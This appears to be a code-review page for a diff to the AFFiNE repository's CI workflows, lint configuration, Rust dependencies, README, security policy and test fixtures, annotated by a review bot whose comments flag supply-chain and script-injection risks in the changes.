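Review bot: `apple-actions/import-codesign-certs` is not a first-party `actions/*` action, it receives `secrets.CERTIFICATES_P12_MOBILE`, and this bump keeps it on a mutable major tag (`@v7`). Pin it to a full commit SHA with the version in a trailing comment, so the code that handles the signing certificate cannot change without a reviewed diff.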
@@ -128,9 +128,9 @@ jobs:
- name: Testflight
working-directory: packages/frontend/apps/ios/App
run: |
echo -n "${{ env.BUILD_PROVISION_PROFILE }}" | base64 --decode -o $PP_PATH
mkdir -p ~/Library/MobileDevice/Provisioning\ Profiles
cp $PP_PATH ~/Library/MobileDevice/Provisioning\ Profiles
printf '%s' "$BUILD_PROVISION_PROFILE" | base64 --decode -o "$PP_PATH"
mkdir -p "$HOME/Library/MobileDevice/Provisioning Profiles"
cp "$PP_PATH" "$HOME/Library/MobileDevice/Provisioning Profiles"
fastlane beta
env:
BUILD_TARGET: distribution
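Review bot: the `Testflight` script now reads `$BUILD_PROVISION_PROFILE` from the shell environment instead of interpolating `${{ env.BUILD_PROVISION_PROFILE }}` into the script text, but only `BUILD_TARGET` is visible in this step's `env:`; confirm the variable is defined at step, job or workflow `env:` level, otherwise `base64 --decode` receives empty input. Adding `set -euo pipefail` as the first line, as the `Load Google Service file` step in this file does, would turn an unset variable into a hard failure.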
@@ -147,7 +147,7 @@ jobs:
needs:
- build-android-web
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -160,7 +160,9 @@ jobs:
- name: Load Google Service file
env:
DATA: ${{ secrets.FIREBASE_ANDROID_GOOGLE_SERVICE_JSON }}
run: echo $DATA | base64 -di > packages/frontend/apps/android/App/app/google-services.json
run: |
set -euo pipefail
printf '%s' "$DATA" | base64 -di > packages/frontend/apps/android/App/app/google-services.json
- name: Setup Node.js
uses: ./.github/actions/setup-node
timeout-minutes: 10
@@ -178,7 +180,7 @@ jobs:
no-build: 'true'
- name: Cap sync
run: yarn workspace @affine/android cap sync
- uses: actions/setup-python@v5
- uses: actions/setup-python@v6
with:
python-version: '3.13'
- name: Auth gcloud
@@ -190,7 +192,7 @@ jobs:
token_format: 'access_token'
project_id: '${{ secrets.GCP_PROJECT_ID }}'
access_token_scopes: 'https://www.googleapis.com/auth/androidpublisher'
- uses: actions/setup-java@v4
- uses: actions/setup-java@v5
with:
distribution: 'temurin'
java-version: '21'
+4 -3
@@ -55,7 +55,7 @@ jobs:
GIT_SHORT_HASH: ${{ steps.prepare.outputs.GIT_SHORT_HASH }}
BUILD_TYPE: ${{ steps.prepare.outputs.BUILD_TYPE }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Prepare Release
id: prepare
uses: ./.github/actions/prepare-release
@@ -72,7 +72,7 @@ jobs:
steps:
- name: Decide whether to release
id: decide
uses: actions/github-script@v7
uses: actions/github-script@v9
with:
script: |
const buildType = '${{ needs.prepare.outputs.BUILD_TYPE }}'
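Review bot: the context line `const buildType = '${{ needs.prepare.outputs.BUILD_TYPE }}'` pastes an expression into the script source, so a value containing a quote would change the JavaScript that runs. While this step is being touched for the `@v9` bump, pass the value through `env:` and read it with `process.env.BUILD_TYPE`.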
@@ -148,7 +148,7 @@ jobs:
name: Wait for approval
with:
secret: ${{ secrets.GITHUB_TOKEN }}
approvers: darkskygit,pengx17,L-Sun,EYHN
approvers: darkskygit
minimum-approvals: 1
fail-on-denial: true
issue-title: Please confirm to release docker image
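Review bot: reducing `approvers` to the single account `darkskygit` while keeping `minimum-approvals: 1` makes one account the only control on the Docker image release: the gate cannot be satisfied if that account is unavailable, and there is no second reviewer if it is compromised. If the removed accounts no longer have release responsibility, replace them rather than dropping to one, and state in the commit message why the list changed.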
@@ -195,6 +195,7 @@ jobs:
desktop_macos: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_macos }}
desktop_windows: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_windows }}
desktop_linux: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_linux }}
require-windows-signing: ${{ needs.prepare.outputs.BUILD_TYPE == 'beta' || needs.prepare.outputs.BUILD_TYPE == 'stable' || (github.event_name == 'workflow_dispatch' && inputs.desktop_windows) }}
mobile:
name: Release Mobile
+35 -5
@@ -30,13 +30,43 @@ jobs:
run: |
cd ${{ env.ARCHIVE_DIR }}/out
signtool sign /tr http://timestamp.globalsign.com/tsa/r6advanced1 /td sha256 /fd sha256 /a ${{ inputs.files }}
- name: zip file
shell: cmd
- name: collect signed file diff
shell: powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -File {0}
run: |
cd ${{ env.ARCHIVE_DIR }}
7za a signed.zip .\out\*
$OutDir = Join-Path '${{ env.ARCHIVE_DIR }}' 'out'
$DiffDir = Join-Path '${{ env.ARCHIVE_DIR }}' 'signed-diff'
$FilesDir = Join-Path $DiffDir 'files'
New-Item -ItemType Directory -Path $FilesDir -Force | Out-Null
$SignedFiles = [regex]::Matches('${{ inputs.files }}', '"([^"]+)"') | ForEach-Object { $_.Groups[1].Value }
if ($SignedFiles.Count -eq 0) {
throw 'No files to sign were provided.'
}
$Manifest = @()
foreach ($RelativePath in $SignedFiles) {
$SourcePath = Join-Path $OutDir $RelativePath
if (!(Test-Path -LiteralPath $SourcePath -PathType Leaf)) {
throw "Signed file not found: $RelativePath"
}
$TargetPath = Join-Path $FilesDir $RelativePath
$TargetDir = Split-Path -Parent $TargetPath
if ($TargetDir) {
New-Item -ItemType Directory -Path $TargetDir -Force | Out-Null
}
Copy-Item -LiteralPath $SourcePath -Destination $TargetPath -Force
$Manifest += [PSCustomObject]@{
path = $RelativePath
sha256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
}
}
$Manifest | ConvertTo-Json -Depth 4 | Out-File -FilePath (Join-Path $DiffDir 'manifest.json') -Encoding utf8
Write-Host "Collected $($SignedFiles.Count) signed files."
- name: upload
uses: actions/upload-artifact@v4
with:
name: signed-${{ inputs.artifact-name }}
path: ${{ env.ARCHIVE_DIR }}/signed.zip
path: ${{ env.ARCHIVE_DIR }}/signed-diff
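Review bot: `'${{ inputs.files }}'` is expanded into the PowerShell source inside single quotes (and into the `signtool sign` command line above it), so a file name containing `'` ends the literal and the remainder is parsed as script. Pass the list through `env:` and read it from `$env:` in the script. In the loop, `Join-Path $OutDir $RelativePath` is not checked to resolve inside `$OutDir`, so a `..` segment in an entry would copy a file from outside the build output into the diff; resolve the full path and compare its prefix before `Copy-Item`. The manifest hash is also taken from whatever is on disk after `signtool` runs; checking the `Get-AuthenticodeSignature` status of each file before hashing would make the manifest an assertion that the file is actually signed.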
+10
@@ -6,6 +6,7 @@
!.yarn/releases
!.yarn/sdks
.yarn/versions
.corepack-bin
# compiled output
*dist
@@ -48,6 +49,9 @@ testem.log
/typings
tsconfig.tsbuildinfo
.context
/*.md
.codex
.cursor
# System Files
.DS_Store
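Review bot: the added `/*.md` pattern ignores every untracked Markdown file at the repository root, so a new top-level document such as a policy or changelog file would be silently left out of commits. If the intent is to hide scratch notes kept next to `.context`, `.codex` and `.cursor`, ignore those specific file names, or follow the pattern with negations for the root documents that must stay tracked.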
@@ -92,3 +96,9 @@ af.cmd
# playwright
storageState.json
/.understand-anything
# local test/browser artifacts
/.playwright-browsers/
**/.vitest-attachments/
/blocksuite/framework/std/src/__tests__/gfx/__screenshots__/
+1 -1
@@ -1 +1 @@
22.22.0
22.22.3
+162 -4
@@ -1,16 +1,30 @@
{
"$schema": "./node_modules/oxlint/configuration_schema.json",
"jsPlugins": [
"eslint-plugin-simple-import-sort",
"eslint-plugin-sonarjs",
"eslint-plugin-lit"
],
"plugins": ["import", "react", "typescript", "unicorn", "promise"],
"categories": {
"correctness": "error",
"perf": "error"
},
"options": {
"typeAware": true
},
"env": {
"builtin": true,
"es2026": true
},
"ignorePatterns": [
"**/node_modules",
".yarn",
".github/helm",
".git",
".vscode",
".context",
".codex",
".yarnrc.yml",
".docker",
"**/.storybook",
@@ -39,11 +53,63 @@
"packages/frontend/apps/ios/App/**",
"tests/blocksuite/snapshots",
"blocksuite/docs/api/**",
"blocksuite/docs-site/.vitepress/.temp/**",
"blocksuite/docs-site/api/**",
"packages/frontend/admin/src/config.json",
"**/test-docs.json",
"**/test-blocks.json"
],
"rules": {
"no-empty-static-block": "error",
"no-misleading-character-class": "error",
"no-new-native-nonconstructor": "error",
"no-unused-private-class-members": "error",
"no-useless-backreference": "error",
"react/display-name": "error",
"react/rules-of-hooks": "error",
"react/exhaustive-deps": "warn",
"typescript/prefer-for-of": "error",
"typescript/no-unsafe-function-type": "error",
"typescript/no-wrapper-object-types": "error",
"typescript/unified-signatures": "error",
"typescript/await-thenable": "allow",
"typescript/no-floating-promises": "allow",
"typescript/no-misused-promises": "allow",
"typescript/prefer-readonly": "allow",
"typescript/require-array-sort-compare": "allow",
"typescript/return-await": ["error", "error-handling-correctness-only"],
"typescript/no-array-delete": "allow",
"typescript/no-base-to-string": "allow",
"typescript/no-duplicate-type-constituents": "allow",
"typescript/no-for-in-array": "allow",
"typescript/no-implied-eval": "allow",
"typescript/no-meaningless-void-operator": "allow",
"typescript/no-misused-spread": "allow",
"typescript/no-redundant-type-constituents": "allow",
"typescript/no-unnecessary-parameter-property-assignment": "allow",
"typescript/no-unsafe-unary-minus": "allow",
"typescript/no-useless-empty-export": "allow",
"typescript/prefer-namespace-keyword": "allow",
"typescript/prefer-string-starts-ends-with": "allow",
"typescript/restrict-template-expressions": "allow",
"typescript/unbound-method": "allow",
"no-restricted-imports": [
"error",
{
"patterns": [
{
"group": ["**/dist"],
"message": "Don't import from dist",
"allowTypeImports": false
},
{
"group": ["**/src"],
"message": "Don't import from src",
"allowTypeImports": false
}
]
}
],
"no-await-in-loop": "allow",
"no-redeclare": "allow",
"promise/no-callback-in-promise": "allow",
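Review bot: among the type-aware rules set to `allow` in this hunk, `typescript/no-implied-eval` is the one with a security function (string arguments to `setTimeout`, `setInterval` or `new Function`), and unlike `typescript/no-floating-promises` and `typescript/no-misused-promises` it is not turned back on in the overrides block later in this file. Set it to `error` globally, or add it to the `packages/**`, `tools/**`, `blocksuite/**` override.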
@@ -70,6 +136,14 @@
"no-func-assign": "error",
"no-global-assign": "error",
"no-unused-vars": "error",
"no-unused-expressions": [
"error",
{
"allowShortCircuit": true,
"allowTernary": true,
"allowTaggedTemplates": true
}
],
"no-ex-assign": "error",
"no-loss-of-precision": "error",
"no-fallthrough": "error",
@@ -126,6 +200,30 @@
"react/no-render-return-value": "error",
"react/jsx-no-target-blank": "error",
"react/jsx-no-comment-textnodes": "error",
"react/no-array-index-key": "off",
"simple-import-sort/imports": "error",
"simple-import-sort/exports": "error",
"sonarjs/no-all-duplicated-branches": "error",
"sonarjs/no-element-overwrite": "error",
"sonarjs/no-empty-collection": "error",
"sonarjs/no-extra-arguments": "error",
"sonarjs/no-identical-conditions": "error",
"sonarjs/no-identical-expressions": "error",
"sonarjs/no-ignored-return": "error",
"sonarjs/no-use-of-empty-return-value": "error",
"sonarjs/non-existent-operator": "error",
"sonarjs/no-collapsible-if": "error",
"sonarjs/no-same-line-conditional": "error",
"sonarjs/no-duplicated-branches": "error",
"sonarjs/no-collection-size-mischeck": "error",
"sonarjs/no-identical-functions": "error",
"sonarjs/no-gratuitous-expressions": "error",
"lit/attribute-value-entities": "error",
"lit/binding-positions": "error",
"lit/no-duplicate-template-bindings": "error",
"lit/no-invalid-html": "error",
"lit/no-legacy-template-syntax": "error",
"lit/no-property-change-update": "error",
"typescript/consistent-type-imports": "error",
"typescript/no-non-null-assertion": "error",
"typescript/triple-slash-reference": "error",
@@ -133,7 +231,6 @@
"typescript/no-duplicate-enum-values": "error",
"typescript/no-extra-non-null-assertion": "error",
"typescript/no-misused-new": "error",
"typescript/prefer-for-of": "error",
"typescript/no-unsafe-declaration-merging": "error",
"typescript/no-unnecessary-type-constraint": "error",
"typescript/no-this-alias": [
@@ -185,11 +282,10 @@
"ignoreTypes": true
}
],
"import/sort-imports": "error",
"import/namespace": "off",
"import/no-webpack-loader-syntax": "error",
"import/no-duplicates": "error",
"import/no-import-assign": "error",
"no-import-assign": "error",
"import/no-self-import": "error"
},
"overrides": [
@@ -228,7 +324,7 @@
{
"files": ["blocksuite/**/*.ts"],
"rules": {
"eslint/eqeqeq": "off",
"eqeqeq": "off",
"typescript/no-non-null-assertion": "off",
"unicorn/prefer-array-some": "off"
}
@@ -241,6 +337,68 @@
"typescript/consistent-type-imports": "off",
"import/no-cycle": "off"
}
},
{
"files": [
"packages/**/*.{ts,tsx}",
"tools/**/*.{ts,tsx}",
"blocksuite/**/*.{ts,tsx}"
],
"rules": {
"typescript/await-thenable": "error",
"typescript/no-floating-promises": [
"error",
{
"ignoreVoid": false,
"ignoreIIFE": false
}
],
"typescript/no-misused-promises": "error",
"typescript/prefer-readonly": "error",
"typescript/require-array-sort-compare": "error",
"react/exhaustive-deps": [
"warn",
{
"additionalHooks": "(useAsyncCallback|useCatchEventCallback|useDraggable|useDropTarget|useRefEffect)"
}
]
}
},
{
"files": [
"**/__tests__/**/*",
"**/*.stories.tsx",
"**/*.spec.ts",
"**/tests/**/*",
"scripts/**/*",
"**/benchmark/**/*",
"**/__debug__/**/*",
"**/e2e/**/*"
],
"rules": {
"typescript/no-floating-promises": [
"error",
{
"ignoreVoid": true,
"ignoreIIFE": false
}
],
"typescript/no-misused-promises": "off",
"no-restricted-imports": "off"
}
},
{
"files": ["**/*.{ts,js,mjs}"],
"rules": {
"react/rules-of-hooks": "off"
}
},
{
"files": ["blocksuite/framework/std/src/view/element/lit-host.ts"],
"rules": {
"lit/binding-positions": "off",
"lit/no-invalid-html": "off"
}
}
]
}
+4
@@ -4,6 +4,8 @@
.github/helm
.git
.vscode
.context
.codex
.yarnrc.yml
.docker
**/.storybook
@@ -38,6 +40,8 @@ packages/frontend/apps/android/App/**
packages/frontend/apps/ios/App/**
tests/blocksuite/snapshots
blocksuite/docs/api/**
blocksuite/docs-site/.vitepress/.temp/**
blocksuite/docs-site/api/**
packages/frontend/admin/src/config.json
**/test-docs.json
**/test-blocks.json
+3 -1
@@ -17,7 +17,7 @@
"explorer.fileNesting.enabled": true,
"explorer.fileNesting.patterns": {
"*.js": "${capture}.js.map, ${capture}.min.js, ${capture}.d.ts, ${capture}.d.ts.map",
"package.json": ".browserslist*, .circleci*, .codecov, .commitlint*, .cz-config.js, .czrc, .dlint.json, .dprint.json, .editorconfig, .eslint*, eslint.*, .firebase*, .flowconfig, .github*, .gitlab*, .gitpod*, .huskyrc*, .jslint*, .lighthouserc.*, .lintstagedrc*, .markdownlint*, .mocha*, .node-version, .nodemon*, .npm*, .nvmrc, .pm2*, .pnp.*, .pnpm*, .prettier*, .releaserc*, .sentry*, .stackblitz*, .styleci*, .stylelint*, .tazerc*, .textlint*, .tool-versions, .travis*, .versionrc*, .vscode*, .watchman*, .xo-config*, .yamllint*, .yarnrc*, Procfile, api-extractor.json, apollo.config.*, appveyor*, ava.config.*, azure-pipelines*, bower.json, build.config.*, commitlint*, dangerfile*, dlint.json, dprint.json, firebase.json, grunt*, gulp*, histoire.config.*, jasmine.*, jenkins*, jest.config.*, jsconfig.*, karma*, lerna*, lighthouserc.*, lint-staged*, nest-cli.*, netlify*, nodemon*, nx.*, package-lock.json, package.nls*.json, phpcs.xml, playwright.config.*, pm2.*, pnpm*, prettier*, pullapprove*, puppeteer.config.*, pyrightconfig.json, release-tasks.sh, renovate*, rollup.config.*, stylelint*, tsconfig.*, tsdoc.*, tslint*, tsup.config.*, turbo*, typedoc*, unlighthouse*, vercel*, vetur.config.*, vitest.*, webpack*, workspace.json, xo.config.*, yarn*, babel.*, .babelrc, project.json, oxlint.json, nyc.config.*",
"package.json": ".browserslist*, .circleci*, .codecov, .commitlint*, .cz-config.js, .czrc, .dlint.json, .dprint.json, .editorconfig, .eslint*, eslint.*, .firebase*, .flowconfig, .github*, .gitlab*, .gitpod*, .huskyrc*, .jslint*, .lighthouserc.*, .lintstagedrc*, .markdownlint*, .mocha*, .node-version, .nodemon*, .npm*, .nvmrc, .pm2*, .pnp.*, .pnpm*, .prettier*, .releaserc*, .sentry*, .stackblitz*, .styleci*, .stylelint*, .tazerc*, .textlint*, .tool-versions, .travis*, .versionrc*, .vscode*, .watchman*, .xo-config*, .yamllint*, .yarnrc*, Procfile, api-extractor.json, apollo.config.*, appveyor*, ava.config.*, azure-pipelines*, bower.json, build.config.*, commitlint*, dangerfile*, dlint.json, dprint.json, firebase.json, grunt*, gulp*, histoire.config.*, jasmine.*, jenkins*, jest.config.*, jsconfig.*, karma*, lerna*, lighthouserc.*, lint-staged*, nest-cli.*, netlify*, nodemon*, nx.*, package-lock.json, package.nls*.json, phpcs.xml, playwright.config.*, pm2.*, pnpm*, prettier*, pullapprove*, puppeteer.config.*, pyrightconfig.json, release-tasks.sh, renovate*, rollup.config.*, stylelint*, tsconfig.*, tsdoc.*, tslint*, tsup.config.*, turbo*, typedoc*, unlighthouse*, vercel*, vetur.config.*, vitest.*, webpack*, workspace.json, xo.config.*, yarn*, babel.*, .babelrc, project.json, .oxlintrc.json, oxlint.json, nyc.config.*",
"Cargo.toml": "Cargo.lock, rust-toolchain*, rustfmt.toml, .taplo.toml",
"README.md": "LICENSE*, CHANGELOG.md, CODE_OF_CONDUCT.md, CONTRIBUTING.md, SECURITY.md, README.*",
".gitignore": ".gitattributes, .dockerignore, .eslintignore, .prettierignore, .stylelintignore, .tslintignore, .yarnignore"
@@ -32,6 +32,8 @@
"editor.defaultFormatter": "esbenp.prettier-vscode"
},
"vitest.include": ["packages/**/*.spec.ts", "packages/**/*.spec.tsx"],
"eslint.runtime": "node",
"eslint.execArgv": ["--max_old_space_size=16384"],
"rust-analyzer.check.extraEnv": {
"DATABASE_URL": "sqlite:affine.db"
},
-942
File diff suppressed because one or more lines are too long
+940
File diff suppressed because one or more lines are too long
+1 -1
@@ -12,4 +12,4 @@ npmPublishAccess: public
npmRegistryServer: "https://registry.npmjs.org"
yarnPath: .yarn/releases/yarn-4.12.0.cjs
yarnPath: .yarn/releases/yarn-4.13.0.cjs
Generated
+4735 -867
File diff suppressed because it is too large
+37 -25
@@ -2,8 +2,6 @@
members = [
"./packages/backend/native",
"./packages/common/native",
"./packages/common/y-octo/core",
"./packages/common/y-octo/utils",
"./packages/frontend/mobile-native",
"./packages/frontend/native",
"./packages/frontend/native/nbstore",
@@ -16,13 +14,14 @@ resolver = "3"
edition = "2024"
[workspace.dependencies]
aes-gcm = "0.10"
affine_common = { path = "./packages/common/native" }
affine_nbstore = { path = "./packages/frontend/native/nbstore" }
ahash = "0.8"
anyhow = "1"
arbitrary = { version = "1.3", features = ["derive"] }
assert-json-diff = "2.0"
async-lock = { version = "3.4.0", features = ["loom"] }
base64 = "0.22.1"
base64-simd = "0.8"
bitvec = "1.0"
block2 = "0.6"
@@ -36,17 +35,31 @@ resolver = "3"
criterion2 = { version = "3", default-features = false }
crossbeam-channel = "0.5"
dispatch2 = "0.3"
docx-parser = { git = "https://github.com/toeverything/docx-parser" }
doc_extractor = "0.1.0"
dotenvy = "0.15"
file-format = { version = "0.28", features = ["reader"] }
hex = "0.4"
homedir = "0.3"
image = { version = "0.25.9", default-features = false, features = [
"bmp",
"gif",
"jpeg",
"png",
"webp",
] }
infer = { version = "0.19.0" }
lasso = { version = "0.7", features = ["multi-threaded"] }
lib0 = { version = "0.16", features = ["lib0-serde"] }
libc = "0.2"
libwebp-sys = "0.14.2"
little_exif = "0.6.23"
llm_adapter = { version = "0.2", default-features = false }
llm_runtime = { version = "0.2", default-features = false }
log = "0.4"
loom = { version = "0.7", features = ["checkpoint"] }
memory-indexer = "0.3.0"
lru = "0.16"
matroska = "0.30"
memory-indexer = "0.3.1"
mermaid-rs-renderer = { git = "https://github.com/toeverything/mermaid-rs-renderer", rev = "fba9097", default-features = false }
mimalloc = "0.1"
mp4parse = "0.17"
nanoid = "0.4"
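Review bot: `mermaid-rs-renderer` is pulled from git at the abbreviated rev `fba9097`; use the full 40-character commit hash so the manifest names exactly one commit. The hunk also lists several `0.x` registry crates (`doc_extractor`, `llm_adapter`, `llm_runtime`); note in the PR description who publishes them, since the `Cargo.lock` diff is suppressed on this page and cannot be reviewed here.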
@@ -63,11 +76,11 @@ resolver = "3"
notify = { version = "8", features = ["serde"] }
objc2 = "0.6"
objc2-foundation = "0.3"
ogg = "0.9"
once_cell = "1"
ordered-float = "5"
p256 = { version = "0.13", features = ["ecdsa", "pem"] }
parking_lot = "0.12"
path-ext = "0.1.2"
pdf-extract = { git = "https://github.com/toeverything/pdf-extract", branch = "darksky/improve-font-decoding" }
phf = { version = "0.11", features = ["macros"] }
proptest = "1.3"
proptest-derive = "0.5"
@@ -76,12 +89,14 @@ resolver = "3"
rand_chacha = "0.9"
rand_distr = "0.5"
rayon = "1.10"
readability = { version = "0.3.0", default-features = false }
regex = "1.10"
rubato = "0.16"
safefetch = "0.1.0"
schemars = "0.8"
screencapturekit = "0.3"
serde = "1"
serde_json = "1"
sha2 = "0.10"
sha3 = "0.10"
smol_str = "0.3"
sqlx = { version = "0.8", default-features = false, features = [
@@ -90,26 +105,19 @@ resolver = "3"
"migrate",
"runtime-tokio",
"sqlite",
"tls-rustls",
] }
strum_macros = "0.27.0"
symphonia = { version = "0.5", features = ["all", "opt-simd"] }
text-splitter = "0.27"
thiserror = "2"
tiktoken-rs = "0.7"
tokio = "1.45"
tree-sitter = { version = "0.25" }
tree-sitter-c = { version = "0.24" }
tree-sitter-c-sharp = { version = "0.23" }
tree-sitter-cpp = { version = "0.23" }
tree-sitter-go = { version = "0.23" }
tree-sitter-java = { version = "0.23" }
tree-sitter-javascript = { version = "0.23" }
tree-sitter-kotlin-ng = { version = "1.1" }
tree-sitter-python = { version = "0.23" }
tree-sitter-rust = { version = "0.24" }
tree-sitter-scala = { version = "0.24" }
tree-sitter-typescript = { version = "0.23" }
typst = "0.14.2"
typst-as-lib = { version = "0.15.4", default-features = false, features = [
"packages",
"typst-kit-embed-fonts",
"typst-kit-fonts",
"ureq",
] }
typst-svg = "0.14.2"
uniffi = "0.29"
url = { version = "2.5" }
uuid = "1.8"
@@ -127,7 +135,7 @@ resolver = "3"
"Win32_UI_Shell_PropertiesSystem",
] }
windows-core = { version = "0.61" }
y-octo = { path = "./packages/common/y-octo/core" }
y-octo = "0.0.3"
y-sync = { version = "0.4" }
yrs = "0.23.0"
@@ -143,3 +151,7 @@ strip = "symbols"
# android uniffi bindgen requires symbols
[profile.release.package.affine_mobile_native]
strip = "none"
# [patch.crates-io]
# llm_adapter = { path = "../llm_adapter/crates/llm_adapter" }
# llm_runtime = { path = "../llm_adapter/crates/llm_runtime" }
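Review bot: The commented-out `[patch.crates-io]` block at the end of the manifest points at `../llm_adapter/...`, a sibling checkout outside this repository, so it is a local development override rather than project configuration. Drop it from the committed manifest or move it to the contributor docs; if someone uncomments it, the build uses whatever is in that directory instead of the registry crates.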
+8 -14
@@ -90,10 +90,10 @@ Thanks for checking us out, we appreciate your interest and sincerely hope that
## Contributing
| Bug Reports | Feature Requests | Questions/Discussions | AFFiNE Community |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ---------------------------------------------------------- |
| [Create a bug report](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=bug%2Cproduct-review&template=BUG-REPORT.yml&title=TITLE) | [Submit a feature request](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=feat%2Cproduct-review&template=FEATURE-REQUEST.yml&title=TITLE) | [Check GitHub Discussion](https://github.com/toeverything/AFFiNE/discussions) | [Visit the AFFiNE Community](https://community.affine.pro) |
| Something isn't working as expected | An idea for a new feature, or improvements | Discuss and ask questions | A place to ask, learn and engage with others |
| Bug Reports | Feature Requests | Questions/Discussions | AFFiNE Community |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ----------------------------------------------------------------- |
| [Create a bug report](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=bug%2Cproduct-review&template=BUG-REPORT.yml&title=TITLE) | [Submit a feature request](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=feat%2Cproduct-review&template=FEATURE-REQUEST.yml&title=TITLE) | [Check GitHub Discussion](https://github.com/toeverything/AFFiNE/discussions) | [Visit the AFFiNE's Discord](https://affine.pro/redirect/discord) |
| Something isn't working as expected | An idea for a new feature, or improvements | Discuss and ask questions | A place to ask, learn and engage with others |
Calling all developers, testers, tech writers and more! Contributions of all types are more than welcome, you can read more in [docs/types-of-contributions.md](docs/types-of-contributions.md). If you are interested in contributing code, read our [docs/CONTRIBUTING.md](docs/CONTRIBUTING.md) and feel free to check out our GitHub issues to get stuck in to show us what youre made of.
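Review bot: In the contributing table the link text `Visit the AFFiNE's Discord` is ungrammatical, and the column header above it still reads `AFFiNE Community` while the target is now `https://affine.pro/redirect/discord`. Use `Visit AFFiNE's Discord` and rename the header to match, so readers can tell from the table that the link leaves for a third-party chat service through a redirect.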
@@ -101,11 +101,9 @@ Calling all developers, testers, tech writers and more! Contributions of all typ
For **bug reports**, **feature requests** and other **suggestions** you can also [create a new issue](https://github.com/toeverything/AFFiNE/issues/new/choose) and choose the most appropriate template for your feedback.
For **translation** and **language support** you can visit our [i18n General Space](https://community.affine.pro/c/i18n-general).
For **translation** and **language support** you can visit our [Discord](https://affine.pro/redirect/discord).
Looking for **other ways to contribute** and wondering where to start? Check out the [AFFiNE Ambassador program](https://community.affine.pro/c/start-here/affine-ambassador), we work closely with passionate community members and provide them with a wide range of support and resources.
If you have questions, you are welcome to contact us. One of the best places to get more info and learn more is in the [AFFiNE Community](https://community.affine.pro) where you can engage with other like-minded individuals.
If you have questions, you are welcome to contact us. One of the best places to get more info and learn more is in the [Discord](https://affine.pro/redirect/discord) where you can engage with other like-minded individuals.
## Templates
@@ -182,20 +180,16 @@ Begin with Docker to deploy your own feature-rich, unrestricted version of AFFiN
[![Run on ClawCloud](https://raw.githubusercontent.com/ClawCloud/Run-Template/refs/heads/main/Run-on-ClawCloud.svg)](https://template.run.claw.cloud/?openapp=system-fastdeploy%3FtemplateName%3Daffine)
## Hiring
Some amazing companies, including AFFiNE, are looking for developers! Are you interested in joining AFFiNE or its partners? Check out our [Discord channel](https://affine.pro/redirect/discord) for some of the latest jobs available.
## Feature Request
For feature requests, please see [community.affine.pro](https://community.affine.pro/c/feature-requests/).
For feature requests, please see [discussions](https://github.com/toeverything/AFFiNE/discussions/categories/ideas).
## Building
### Codespaces
From the GitHub repo main page, click the green "Code" button and select "Create codespace on master". This will open a new Codespace with the (supposedly auto-forked
AFFiNE repo cloned, built, and ready to go.
AFFiNE repo cloned, built, and ready to go).
### Local
+2
@@ -23,4 +23,6 @@ We welcome you to provide us with bug reports via and email at [security@toevery
Since we are an open source project, we also welcome you to provide corresponding fix PRs, we will determine specific rewards based on the evaluation results.
Due to limited resources, we do not accept and will not review any AI-generated security reports.
If the vulnerability is caused by a library we depend on, we encourage you to submit a security report to the corresponding dependent library at the same time to benefit more users.
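Review bot: The added sentence "we do not accept and will not review any AI-generated security reports" gives no criterion for what counts as AI-generated, so a reporter who used a tool to draft a report about a real, reproducible issue cannot tell whether it will be read. State the acceptance bar in terms a triager can check, for example a manually verified reproduction against a named version, and say what happens to a report that is rejected on this ground.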
+4 -5
@@ -78,8 +78,7 @@
"@blocksuite/global": "workspace:*",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@blocksuite/sync": "workspace:*",
"rxjs": "^7.8.2"
"@blocksuite/sync": "workspace:*"
},
"exports": {
".": "./src/index.ts",
@@ -296,10 +295,10 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1",
"version": "0.26.3",
"devDependencies": {
"@vanilla-extract/vite-plugin": "^5.0.0",
"msw": "^2.12.4",
"vitest": "^3.2.4"
"msw": "^2.13.2",
"vitest": "^4.1.8"
}
}
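Review bot: The two `vitest` lines in `devDependencies` span a major version (`^3.2.4` and `^4.1.8`), while the package's own `version` only moves between `0.26.1` and `0.26.3`. Call the test-runner major upgrade out in the commit description and confirm the existing snapshot files and test configuration were re-run under it; a major bump folded into a routine dependency refresh is easy to miss when a later test failure has to be bisected.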
@@ -0,0 +1,94 @@
// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html
exports[`snapshot to markdown > imports obsidian vault fixtures 1`] = `
{
"entry": {
"children": [
{
"children": [
{
"children": [
{
"delta": [
{
"insert": "Panel
Body line",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
],
"emoji": "💡",
"flavour": "affine:callout",
},
{
"flavour": "affine:attachment",
"name": "archive.zip",
"style": "horizontalThin",
},
{
"delta": [
{
"footnote": {
"label": "1",
"reference": {
"title": "reference body",
"type": "url",
},
},
"insert": " ",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"flavour": "affine:divider",
},
{
"delta": [
{
"insert": "after note",
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"delta": [
{
"insert": " ",
"reference": {
"page": "linked",
"type": "LinkedPage",
},
},
],
"flavour": "affine:paragraph",
"type": "text",
},
{
"delta": [
{
"insert": "Sources",
},
],
"flavour": "affine:paragraph",
"type": "h6",
},
{
"flavour": "affine:bookmark",
},
],
"flavour": "affine:note",
},
],
"flavour": "affine:page",
},
"titles": [
"entry",
"linked",
],
}
`;
@@ -0,0 +1,14 @@
> [!custom] Panel
> Body line
![[archive.zip]]
[^1]
---
after note
[[linked]]
[^1]: reference body
@@ -0,0 +1 @@
plain linked page
@@ -2101,6 +2101,157 @@ describe('html to snapshot', () => {
expect(nanoidReplacement(rawBlockSnapshot)).toEqual(blockSnapshot);
});
